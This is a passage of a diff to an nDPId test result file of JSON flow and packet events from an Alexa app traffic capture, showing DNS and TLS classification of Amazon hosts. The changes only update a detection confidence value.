{"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1490976101550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976101550,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgdAAEAGAiSsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pRQAAAgQFtAQCCAoA9mX7AAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":3,"flow_last_seen":1490976101623,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976101623,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwX5pAAOcGDZw27xi6rBAq2AG7hRl1e+g1UtF3knASH\/6OkAAAAgQFtAEDAwY="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1490976107217,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1490976107217,"pkt":"AMDKkaPvePiC0\/vCCABFAABFWlxAAEARM1KsECrYrBAqATiMADUAMXUjXSIBAAABAAAAAAAADHNraWxscy1zdG9yZQZhbWF6b24DY29tAAABAAE="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1490976107359,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976107359,"pkt":"ePiC0\/vCAMDKkaPvCABFAABV3nRAAEARrymsECoBrBAq2AA1OIwAQbpsXSKBgAABAAEAAAAADHNraWxscy1zdG9yZQZhbWF6b24DY29tAAABAAHADAABAAEAAAA7AAQ27x39"} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976107359,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.253"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976107359,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.253"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1490976107365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107365,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZVhAAEAGqY+sECrYNu8d\/Z+VAbuWKg0YAAAAAKAC\/\/9uYQAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -583,23 +583,23 @@ 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1490976107455,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107455,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fklAAEAGkJ6sECrYNu8d\/Z+YAbtWLhYAAAAAAKAC\/\/+laQAAAgQFtAQCCAoA9mhJAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1490976107475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwq71AAOcGvDU27x39rBAq2AG7n5aOPa1rI6CEzHASH\/6yzwAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1490976107477,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107477,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7IxAAEAGIm+sECrYNu8d\/Z+WAbsjoITMjj2tbFAQAVf9QAAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107479,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107479,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1490976107484,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107484,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkaBAAOcG1lI27x39rBAq2AG7n5UJgL2ZlioNGXASH\/4siQAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1490976107485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107485,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZVlAAEAGqaKsECrYNu8d\/Z+VAbuWKg0ZCYC9mlAQAVd2+gAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1490976107511,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107511,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwxddAAOcGohs27x39rBAq2AG7n5iFQQi8Vi4WAXASH\/6ctgAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1490976107513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107513,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofkpAAEAGkLGsECrYNu8d\/Z+YAbtWLhYBhUEIvVAQAVfnJwAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1675,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107455,"flow_last_seen":1490976107514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107455,"flow_last_seen":1490976107625,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1675,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107455,"flow_last_seen":1490976107514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107455,"flow_last_seen":1490976107625,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1490976108360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976108360,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8yY9AAEAGRVisECrYNu8d\/Z+XAbtod6HOAAAAAKAC\/\/8G+AAAAgQFtAQCCAoA9mikAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1490976108548,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976108548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt7hAAOcGsDo27x39rBAq2AG7n5d09wMmaHehz3ASH\/4UgAAAAgQFtAEDAwY="} 